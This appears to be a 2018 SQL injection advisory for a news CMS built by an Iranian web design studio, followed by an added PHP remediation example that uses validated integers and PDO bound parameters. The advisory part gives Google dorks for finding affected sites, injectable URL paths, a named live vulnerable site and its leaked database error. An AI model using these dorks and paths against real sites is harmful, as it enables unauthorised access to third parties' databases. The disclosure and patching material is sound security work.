Media-Art.ir HaaYahoo Web Design Studio Iran "طراحی و اجرا: هنر رسانه" (Design and implementation: Media Art) SQL Injection Vulnerability

2018.10.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

##############################################################################################################
# Exploit Title : Media-Art.ir HaaYahoo Web Design Studio Iran "طراحی و اجرا: هنر رسانه" (Design and implementation: Media Art) SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 30/09/2018
# Vendor Homepage : media-art.ir ~ haayahoo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
##############################################################################################################
# Google Dorks :
intext:''طراحی و اجرا: هنر رسانه''
intext:''مجری سایت: هنررسانه''
intext:''طراحی و توسعه هیاهـو''
# SQL Injection Exploits :
/newspaper/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/newspaper/index.php?year=%7Bdate-year%7D&month=%7Bdate-month%7D&day=%7Bdate-day%7D&category=[SQL Injection]
/news/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/PATH/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/index.php?year=[ID-NUMBER]&month=[ID-NUMBER]&day=[ID-NUMBER]&category=[SQL Injection]
/newspaper/index.php?newsid=[SQL Injection]
/newspaper/engine/print.php?newsid=[SQL Injection]
/index.php?newsid=[SQL Injection]
##############################################################################################################
# Example Vulnerable Site => jahansanat.ir/newspaper/index.php?year=1396&month=01&day=28&category=[SQL]
=> [ Proof of Concept ] => archive.is/YXXPC
# SQL Database Error =>
MySQL error in file: /engine/modules/show.short.php at line 65
Error Number: 1064
The Error returned was:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date < '2018-09-30 ' at line 1
SQL query:
SELECT p.id, p.autor, p.date, p.short_story, CHAR_LENGTH(p.full_story) as full_story, p.xfields, p.title, p.category, p.alt_name, p.comm_num, p.allow_comm, p.fixed, p.tags, e.news_read, e.allow_rate, e.rating, e.vote_num, e.votes, e.view_edit, e.editdate, e.editor, e.reason FROM dle_post p LEFT JOIN dle_post_extras e ON (p.id=e.news_id) WHERE date >= '2017-04-17' AND category= AND date < '2017-04-17' + INTERVAL 24 HOUR AND approve=1 AND date < '2018-09-30 03:13:55' ORDER BY date DESC LIMIT 0,1
##############################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
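The error text above shows the root cause: the `category` request parameter is pasted unquoted into the WHERE clause (`AND category= AND date <`), so whatever the client sends becomes SQL. The following is an added example, not code from DataLife Engine, Media-Art or HaaYahoo, of how the archive lookup would be written so that no request value can reach the query text: every parameter is validated as a bare integer first, the 24-hour window is computed in PHP instead of appending `INTERVAL 24 HOUR` to user text, and the remaining values are bound through PDO. The table and column names (`dle_post`, `date`, `category`, `approve`) are taken from the error message; the DSN, the assumption that `category` holds an integer id, and the function names are this example's own.

```php
<?php
declare(strict_types=1);

// Added example (not the vendor's or DataLife Engine's code).
// Read one integer query parameter; anything that is not a string of ASCII
// digits within [min, max] is rejected before any SQL is built.
// Leading zeros such as the page's month=01 are accepted.
function intParam(array $get, string $name, int $min, int $max): ?int
{
    $raw = $get[$name] ?? '';
    if (!is_string($raw) || $raw === '' || strlen($raw) > 6 || !ctype_digit($raw)) {
        return null; // arrays (?category[]=x), empty values and SQL text all end here
    }
    $n = (int) $raw;
    return ($n >= $min && $n <= $max) ? $n : null;
}

// Validate year/month/day/category and compute the date window in PHP.
// Returns ['start' => ..., 'end' => ..., 'category' => int] or null on bad input.
// Year range 1000-9999 covers both Gregorian and Solar Hijri years; calendar
// conversion (the page's 1396/01/28 became 2017-04-17) is outside this example.
function parseArchiveParams(array $get): ?array
{
    $year  = intParam($get, 'year', 1000, 9999);
    $month = intParam($get, 'month', 1, 12);
    $day   = intParam($get, 'day', 1, 31);
    $cat   = intParam($get, 'category', 1, PHP_INT_MAX);
    if ($year === null || $month === null || $day === null || $cat === null
        || !checkdate($month, $day, $year)) {
        return null;
    }
    $start = new DateTimeImmutable(sprintf('%04d-%02d-%02d', $year, $month, $day));
    return [
        'start'    => $start->format('Y-m-d H:i:s'),
        'end'      => $start->modify('+1 day')->format('Y-m-d H:i:s'),
        'category' => $cat,
    ];
}

// Run the archive query with bound parameters only. Returns null when the
// request is invalid (the caller answers HTTP 400 and nothing touches the DB).
function fetchArchivePosts(PDO $db, array $get, string $now): ?array
{
    $p = parseArchiveParams($get);
    if ($p === null) {
        return null;
    }
    $sql = 'SELECT p.id, p.title, p.date FROM dle_post p'
         . ' WHERE p.date >= :start AND p.date < :end AND p.category = :category'
         . ' AND p.approve = 1 AND p.date < :now ORDER BY p.date DESC LIMIT 0, 10';
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':start', $p['start']);
    $stmt->bindValue(':end', $p['end']);
    $stmt->bindValue(':category', $p['category'], PDO::PARAM_INT);
    $stmt->bindValue(':now', $now);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Stand-alone check without a database: the page's request shape is accepted,
// a category carrying SQL text is rejected before a query string exists.
if (PHP_SAPI === 'cli') {
    var_dump(parseArchiveParams(['year' => '1396', 'month' => '01', 'day' => '28', 'category' => '5']));
    var_dump(parseArchiveParams(['year' => '1396', 'month' => '01', 'day' => '28', 'category' => '5 AND 1=1']));
    // Placeholder DSN; real prepared statements need ATTR_EMULATE_PREPARES off
    // so the MySQL server, not the PHP driver, performs the parameter binding:
    // $db = new PDO('mysql:host=DB_HOST;dbname=DB_NAME;charset=utf8mb4', 'DB_USER', 'DB_PASS',
    //               [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
    // $rows = fetchArchivePosts($db, $_GET, date('Y-m-d H:i:s'));
}
```

Two points worth noting for anyone patching a similar archive page: the integer check on `category` is what makes the `category= AND ...` fragment in the error impossible (an empty or non-numeric value never reaches `prepare()`), and the `LIMIT` clause stays a literal because binding it under emulated prepares is a common source of quoting bugs.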

References:

https://www.cyberizm.org/cyberizm-media-art-haayahoo-%D8%B7%D8%B1%D8%A7%D8%AD%DB%8C-%D9%88-%D8%A7%D8%AC%D8%B1%D8%A7-%D9%87%D9%86%D8%B1-%D8%B1%D8%B3%D8%A7%D9%86%D9%87-sql-inj.html

Copyright 2018, cxsecurity.com